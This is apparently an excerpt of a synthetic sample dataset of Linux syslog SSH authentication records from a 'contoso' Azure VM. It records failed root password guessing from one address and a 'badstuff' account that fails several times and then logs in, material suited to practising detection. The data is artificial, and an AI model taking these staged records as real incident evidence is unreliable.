+7935,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 16:34:54,UbuntuDevEnv,2019-06-11 16:34:54,auth,UbuntuDevEnv,info,Connection closed by 104.47.157.103 port 34396 [preauth],6927,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,104.47.157.1,34396,,
+7936,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-07 21:30:32,UbuntuDevEnv,2019-06-07 21:30:31,auth,UbuntuDevEnv,info,Connection closed by 207.154.198.179 port 50724 [preauth],5499,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,207.154.198.1,50724,,
+7937,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-07 21:30:32,UbuntuDevEnv,2019-06-07 21:30:31,auth,UbuntuDevEnv,info,Unable to negotiate with 207.154.198.179 port 50722: no matching host key type found. Their offer: ssh-dss [preauth],5500,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,207.154.198.1,50722,,
+7938,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-07 21:30:32,UbuntuDevEnv,2019-06-07 21:30:31,auth,UbuntuDevEnv,info,Connection closed by 207.154.198.179 port 50726 [preauth],5502,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,207.154.198.1,50726,,
+7939,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-07 21:30:32,UbuntuDevEnv,2019-06-07 21:30:32,auth,UbuntuDevEnv,info,Connection closed by 207.154.198.179 port 50728 [preauth],5501,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,207.154.198.1,50728,,
+7940,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-07 21:30:44,UbuntuDevEnv,2019-06-07 21:30:44,auth,UbuntuDevEnv,info,Did not receive identification string from 139.162.204.61 port 40640,5529,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,139.162.204.6,40640,,
+7941,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-07 22:11:39,UbuntuDevEnv,2019-06-07 22:11:39,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=104.210.58.65  user=badstuff,9633,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,badstuff,104.210.58.6,,0,
+7942,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-07 22:11:42,UbuntuDevEnv,2019-06-07 22:11:41,auth,UbuntuDevEnv,info,Failed password for badstuff from 104.210.58.65 port 36164 ssh2,9633,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,104.210.58.6,36164,,
+7943,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-07 22:11:56,UbuntuDevEnv,2019-06-07 22:11:55,authpriv,UbuntuDevEnv,notice,PAM 2 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=104.210.58.65  user=badstuff,9633,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,badstuff,104.210.58.6,,0,
+7944,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-07 22:11:56,UbuntuDevEnv,2019-06-07 22:11:55,auth,UbuntuDevEnv,info,Connection closed by authenticating user badstuff 104.210.58.65 port 36164 [preauth],9633,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,badstuff,104.210.58.6,36164,,authenticating
+7945,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-07 22:11:56,UbuntuDevEnv,2019-06-07 22:11:55,auth,UbuntuDevEnv,info,message repeated 2 times: [ Failed password for badstuff from 104.210.58.65 port 36164 ssh2],9633,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,104.210.58.6,36164,,
+7946,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-07 22:12:16,UbuntuDevEnv,2019-06-07 22:12:15,auth,UbuntuDevEnv,info,Accepted password for badstuff from 104.210.58.65 port 36530 ssh2,9827,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Sucess,,104.210.58.6,36530,,
+7947,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-07 22:12:16,UbuntuDevEnv,2019-06-07 22:12:15,authpriv,UbuntuDevEnv,info,pam_unix(sshd:session): session opened for user badstuff by (uid=0),9827,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,badstuff,,,0,
+7948,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-07 22:12:16,UbuntuDevEnv,2019-06-07 22:12:15,authpriv,UbuntuDevEnv,info,pam_unix(systemd-user:session): session opened for user badstuff by (uid=0),,10.0.1.4,systemd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,badstuff,,,0,
+7949,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-07 22:12:16,UbuntuDevEnv,2019-06-07 22:12:15,auth,UbuntuDevEnv,info,New session 76 of user badstuff.,1171,10.0.1.4,systemd-logind,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,badstuff,,,,
+7950,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-07 22:12:23,UbuntuDevEnv,2019-06-07 22:12:22,auth,UbuntuDevEnv,info,Disconnected from user badstuff 104.210.58.65 port 36530,9919,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,badstuff,104.210.58.6,36530,,
+7951,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-07 22:12:23,UbuntuDevEnv,2019-06-07 22:12:22,authpriv,UbuntuDevEnv,info,pam_unix(sshd:session): session closed for user badstuff,9827,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,badstuff,,,,
+7952,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-07 22:12:23,UbuntuDevEnv,2019-06-07 22:12:22,auth,UbuntuDevEnv,info,Received disconnect from 104.210.58.65 port 36530:11: disconnected by user,9919,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,104.210.58.6,36530,,user
+7953,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-07 22:12:23,UbuntuDevEnv,2019-06-07 22:12:22,auth,UbuntuDevEnv,info,Removed session 76.,1171,10.0.1.4,systemd-logind,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+7954,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-08 00:25:12,UbuntuDevEnv,2019-06-08 00:25:12,auth,UbuntuDevEnv,info,Connection closed by 35.205.105.135 port 48478 [preauth],24697,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.205.105.1,48478,,
+7955,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 17:19:29,UbuntuDevEnv,2019-06-11 17:19:28,auth,UbuntuDevEnv,info,Disconnected from 167.86.88.143 port 36948 [preauth],16814,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,167.86.88.1,36948,,
+7956,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 17:19:29,UbuntuDevEnv,2019-06-11 17:19:28,auth,UbuntuDevEnv,info,Received disconnect from 167.86.88.143 port 36948:11: Bye Bye [preauth],16814,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,167.86.88.1,36948,,
+7957,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 17:30:35,UbuntuDevEnv,2019-06-11 17:30:35,auth,UbuntuDevEnv,info,Received disconnect from 103.3.226.219 port 47314:11: Bye Bye [preauth],19229,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,103.3.226.2,47314,,
+7958,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 17:30:35,UbuntuDevEnv,2019-06-11 17:30:35,auth,UbuntuDevEnv,info,Disconnected from 103.3.226.219 port 47314 [preauth],19229,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,103.3.226.2,47314,,
+7959,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 17:42:24,UbuntuDevEnv,2019-06-11 17:42:23,auth,UbuntuDevEnv,info,Connection closed by 209.17.96.154 port 50940 [preauth],21981,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,209.17.96.1,50940,,
+7960,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:22:53,UbuntuDevEnv,2019-06-11 18:22:52,auth,UbuntuDevEnv,info,Connection closed by 198.108.66.112 port 57626 [preauth],30728,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,198.108.66.1,57626,,
+7961,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:47:12,UbuntuDevEnv,2019-06-11 18:47:12,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,36312,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+7962,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:47:14,UbuntuDevEnv,2019-06-11 18:47:14,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 14703 ssh2,36312,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,14703,,
+7963,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:47:27,UbuntuDevEnv,2019-06-11 18:47:27,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 61.177.172.128 port 14703 ssh2 [preauth],36312,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,14703,,
+7964,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:47:27,UbuntuDevEnv,2019-06-11 18:47:27,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,36312,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+7965,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:47:27,UbuntuDevEnv,2019-06-11 18:47:27,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 61.177.172.128 port 14703: Too many authentication failures [preauth],36312,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,14703,,
+7966,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:47:27,UbuntuDevEnv,2019-06-11 18:47:27,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 61.177.172.128 port 14703 ssh2],36312,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,14703,,
+7967,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:47:27,UbuntuDevEnv,2019-06-11 18:47:27,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,36312,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+7968,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:47:31,UbuntuDevEnv,2019-06-11 18:47:30,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,36379,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+7969,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:47:32,UbuntuDevEnv,2019-06-11 18:47:32,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 20913 ssh2,36379,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,20913,,
+7970,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:47:46,UbuntuDevEnv,2019-06-11 18:47:45,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,36379,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+7971,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:47:46,UbuntuDevEnv,2019-06-11 18:47:45,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 61.177.172.128 port 20913: Too many authentication failures [preauth],36379,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,20913,,
+7972,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:47:46,UbuntuDevEnv,2019-06-11 18:47:45,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,36379,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+7973,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:47:46,UbuntuDevEnv,2019-06-11 18:47:45,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 61.177.172.128 port 20913 ssh2],36379,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,20913,,
+7974,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:47:46,UbuntuDevEnv,2019-06-11 18:47:45,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 61.177.172.128 port 20913 ssh2 [preauth],36379,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,20913,,
+7975,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:47:53,UbuntuDevEnv,2019-06-11 18:47:52,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,36442,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+7976,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:47:55,UbuntuDevEnv,2019-06-11 18:47:55,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 26886 ssh2,36442,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,26886,,
+7977,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:48:04,UbuntuDevEnv,2019-06-11 18:48:03,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 26886 ssh2,36442,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,26886,,
+7978,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:48:09,UbuntuDevEnv,2019-06-11 18:48:06,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 26886 ssh2,36442,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,26886,,
+7979,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:48:10,UbuntuDevEnv,2019-06-11 18:48:09,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 26886 ssh2,36442,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,26886,,
+7980,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:48:13,UbuntuDevEnv,2019-06-11 18:48:13,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 26886 ssh2,36442,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,26886,,
+7981,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:48:17,UbuntuDevEnv,2019-06-11 18:48:16,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,36442,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+7982,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:48:17,UbuntuDevEnv,2019-06-11 18:48:16,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 26886 ssh2,36442,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,26886,,
+7983,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:48:17,UbuntuDevEnv,2019-06-11 18:48:16,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 61.177.172.128 port 26886 ssh2 [preauth],36442,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,26886,,
+7984,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:48:17,UbuntuDevEnv,2019-06-11 18:48:16,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,36442,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+7985,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:48:17,UbuntuDevEnv,2019-06-11 18:48:16,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 61.177.172.128 port 26886: Too many authentication failures [preauth],36442,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,26886,,
+7986,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:48:22,UbuntuDevEnv,2019-06-11 18:48:22,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,36557,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+7987,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:48:25,UbuntuDevEnv,2019-06-11 18:48:24,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 40616 ssh2,36557,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,40616,,
+7988,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:48:40,UbuntuDevEnv,2019-06-11 18:48:39,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 61.177.172.128 port 40616 ssh2],36557,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,40616,,
+7989,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:48:40,UbuntuDevEnv,2019-06-11 18:48:39,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,36557,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+7990,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:48:40,UbuntuDevEnv,2019-06-11 18:48:39,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 61.177.172.128 port 40616 ssh2 [preauth],36557,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,40616,,
+7991,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:48:40,UbuntuDevEnv,2019-06-11 18:48:39,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 61.177.172.128 port 40616: Too many authentication failures [preauth],36557,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,40616,,
+7992,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:48:40,UbuntuDevEnv,2019-06-11 18:48:39,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,36557,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+7993,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:48:49,UbuntuDevEnv,2019-06-11 18:48:49,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,36636,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+7994,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 18:48:52,UbuntuDevEnv,2019-06-11 18:48:51,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 49344 ssh2,36636,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,49344,,
